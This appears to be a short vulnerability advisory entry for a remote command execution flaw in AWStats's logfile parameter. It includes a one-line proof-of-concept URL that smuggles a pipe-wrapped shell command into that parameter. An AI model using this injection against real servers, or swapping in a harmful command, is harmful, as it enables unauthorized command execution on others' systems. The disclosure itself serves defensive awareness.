|
AWStats Logfile Parameter Remote Command Execution Vulnerability
An exploit is not required. The following proof of concept supplied by <newbug@chroot.org> is available: http://www.example.com/cgi-bin/awstats.pl?update=1&logfile=|/bin/ls| |
|
Privacy Statement |